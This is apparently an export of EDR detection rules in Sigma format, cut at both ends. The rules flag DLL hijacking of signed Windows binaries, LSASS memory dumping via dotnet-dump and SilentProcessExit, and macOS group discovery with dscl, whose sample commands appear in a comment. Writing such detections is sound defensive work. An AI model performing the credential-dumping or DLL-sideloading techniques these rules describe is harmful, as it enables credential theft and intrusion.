"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586895Z",
"creation_date": "2026-03-23T11:45:34.586900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586907Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_resetengine.yml",
"content": "title: DLL Hijacking via resetengine.exe\nid: c7469ee5-54c5-4538-ae5b-64928810d159\ndescription: |\n Detects potential Windows DLL Hijacking via resetengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'resetengine.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\DismApi.DLL'\n - '\\FVEAPI.dll'\n - '\\ReAgent.dll'\n - '\\ResetEngine.dll'\n - '\\tbs.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c7469ee5-54c5-4538-ae5b-64928810d159",
"rule_name": "DLL Hijacking via resetengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via resetengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c7773add-97e5-4efe-a11f-e99ba3f36f11",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094056Z",
"creation_date": "2026-03-23T11:45:34.094058Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094063Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/bohops/status/1635288066909966338",
"https://learn.microsoft.com/fr-fr/dotnet/core/diagnostics/dotnet-dump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_process_memory_dump_via_dotnet_dump.yml",
"content": "title: Process Memory Dumped via dotnet-dump.exe\nid: c7773add-97e5-4efe-a11f-e99ba3f36f11\ndescription: |\n Detects a suspicious attempt to dump a process' memory using dotnet-dump.exe, the legitimate .NET memory acquisition tool.\n This binary can be used as a LOLBin in order to dump the LSASS.exe process's memory.\n Adversaries may attempt to access credential material stored in the memory of the Local Security Authority Subsystem Service (LSASS) process.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to check the sensitivity of the data handled by the dumped process.\n For instance, LSASS.exe contains authentication secrets used by Windows during a session. As this data is highly sensitive, a dump of this process must be considered critical.\n It is also recommended to analyze the process responsible for the execution of dotnet-dump.exe to look for malicious content or actions.\nreferences:\n - https://twitter.com/bohops/status/1635288066909966338\n - https://learn.microsoft.com/fr-fr/dotnet/core/diagnostics/dotnet-dump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/09/04\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.DotNetDump\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'dotnet-dump.dll'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c7773add-97e5-4efe-a11f-e99ba3f36f11",
"rule_name": "Process Memory Dumped via dotnet-dump.exe",
"rule_description": "Detects a suspicious attempt to dump a process' memory using dotnet-dump.exe, the legitimate .NET memory acquisition tool.\nThis binary can be used as a LOLBin in order to dump the LSASS.exe process's memory.\nAdversaries may attempt to access credential material stored in the memory of the Local Security Authority Subsystem Service (LSASS) process.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to check the sensitivity of the data handled by the dumped process.\nFor instance, LSASS.exe contains authentication secrets used by Windows during a session. As this data is highly sensitive, a dump of this process must be considered critical.\nIt is also recommended to analyze the process responsible for the execution of dotnet-dump.exe to look for malicious content or actions.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c7db9e9c-c52d-4c5a-890e-f53bebd19c29",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088703Z",
"creation_date": "2026-03-23T11:45:34.088704Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088709Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_magnify.yml",
"content": "title: DLL Hijacking via magnify.exe\nid: c7db9e9c-c52d-4c5a-890e-f53bebd19c29\ndescription: |\n Detects potential Windows DLL Hijacking via magnify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'magnify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d9.dll'\n - '\\MAGNIFICATION.dll'\n - '\\OLEACC.dll'\n - '\\UIAutomationCore.DLL'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c7db9e9c-c52d-4c5a-890e-f53bebd19c29",
"rule_name": "DLL Hijacking via magnify.exe",
"rule_description": "Detects potential Windows DLL Hijacking via magnify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c80c4c5b-0721-41af-9658-26d11add3470",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628483Z",
"creation_date": "2026-03-23T11:45:34.628485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628489Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1069_001_dscl_groups_macos.yml",
"content": "title: Groups Discovered via Dscl\nid: c80c4c5b-0721-41af-9658-26d11add3470\ndescription: |\n Detects the execution of the dscl command to list all groups.\n Attackers may use it during the discovery phase of an attack to get the list of groups to which a user belongs to.\n It is recommended to check for malicious behavior by the process launching dscl and correlate this alert with any other discovery activity.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n # dscl . -list groups\n # dscl . -list /Groups\n # dscl . -list /Groups/../Groups\n # dscl . search /Groups \"Password\" \"*\"\n Image: '/usr/bin/dscl'\n ParentImage|contains: '?'\n CommandLine|contains:\n - 'list '\n - 'search '\n\n selection_groups:\n CommandLine|contains: 'groups'\n\n exclusion_jamf:\n ParentImage: '/usr/local/jamf/bin/jamf'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n exclusion_mac_helper:\n ParentImage: '/Library/PrivilegedHelperTools/com.nordvpn.macos.helper'\n\n exclusion_pkinstallsandbox:\n GrandparentCommandLine: '/bin/sh -x /tmp/PKInstallSandbox.??????/Scripts/com.paloaltonetworks.pkg.cortex.??????/postinstall /usr/local/etc/FileWaveInstallers/FlatPackage-Cortex XDR.pkg/Cortex XDR.pkg / / /'\n\n exclusion_package_script_service:\n GrandparentImage: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_wapt:\n ParentImage: '/opt/wapt/wapt-get.bin'\n\n condition: selection_base and selection_groups and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c80c4c5b-0721-41af-9658-26d11add3470",
"rule_name": "Groups Discovered via Dscl",
"rule_description": "Detects the execution of the dscl command to list all groups.\nAttackers may use it during the discovery phase of an attack to get the list of groups to which a user belongs to.\nIt is recommended to check for malicious behavior by the process launching dscl and correlate this alert with any other discovery activity.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c82a4b4b-151b-46f2-9434-1433fd02d1e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588398Z",
"creation_date": "2026-03-23T11:45:34.588401Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588409Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cy.yml",
"content": "title: DLL Hijacking via cydump.exe\nid: c82a4b4b-151b-46f2-9434-1433fd02d1e7\ndescription: |\n Detects potential Windows DLL Hijacking via cydump.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/01\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cydump.exe'\n ProcessSignature|contains: 'Palo Alto Networks'\n # https://www.herdprotect.com/winutils.dll-458cf7d1960de61713a37a78ea89a12d1c119088.aspx\n ImageLoaded|endswith: '\\winutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature|contains: 'Palo Alto Networks'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c82a4b4b-151b-46f2-9434-1433fd02d1e7",
"rule_name": "DLL Hijacking via cydump.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cydump.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-01",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c90ae8a5-2c24-4391-8726-bca61e75fc08",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076081Z",
"creation_date": "2026-03-23T11:45:34.076083Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076088Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html",
"https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/",
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_oleview.yml",
"content": "title: DLL Hijacking via OLEVIEW.exe\nid: c90ae8a5-2c24-4391-8726-bca61e75fc08\ndescription: |\n Detects potential Windows DLL Hijacking via OLEVIEW.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html\n - https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'OLEVIEW.EXE'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\aclui.dll'\n - '\\iviewers.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x86\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x86\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x86\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x86\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c90ae8a5-2c24-4391-8726-bca61e75fc08",
"rule_name": "DLL Hijacking via OLEVIEW.exe",
"rule_description": "Detects potential Windows DLL Hijacking via OLEVIEW.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c92bee55-bc7b-4337-9e4c-085336a03e25",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086612Z",
"creation_date": "2026-03-23T11:45:34.086614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086618Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/LsassSilentProcessExit",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1003_001_lsass_silent_process_exit_remote_thread.yml",
"content": "title: Suspicious SilentProcessExit Remote Thread Started on LSASS\nid: c92bee55-bc7b-4337-9e4c-085336a03e25\ndescription: |\n Detects the creation of a remote thread executing the RtlReportSilentProcessExit function on LSASS.\n Attackers can use the SilentProcessExit registry key to trigger the creation of a process dump through WerFault.\n This technique can be used to silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to analyze the process reponsible for accessing LSASS to look for malicious content or actions and to start memory forensic to determine compromised credentials.\nreferences:\n - https://github.com/deepinstinct/LsassSilentProcessExit\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/02/06\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - attack.persistence\n - attack.t1546.012\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlReportSilentProcessExit'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c92bee55-bc7b-4337-9e4c-085336a03e25",
"rule_name": "Suspicious SilentProcessExit Remote Thread Started on LSASS",
"rule_description": "Detects the creation of a remote thread executing the RtlReportSilentProcessExit function on LSASS.\nAttackers can use the SilentProcessExit registry key to trigger the creation of a process dump through WerFault.\nThis technique can be used to silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to analyze the process reponsible for accessing LSASS to look for malicious content or actions and to start memory forensic to determine compromised credentials.\n",
"rule_creation_date": "2023-02-06",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055",
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c93e3348-ae77-418f-abad-6f51f9171f97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078007Z",
"creation_date": "2026-03-23T11:45:34.078009Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
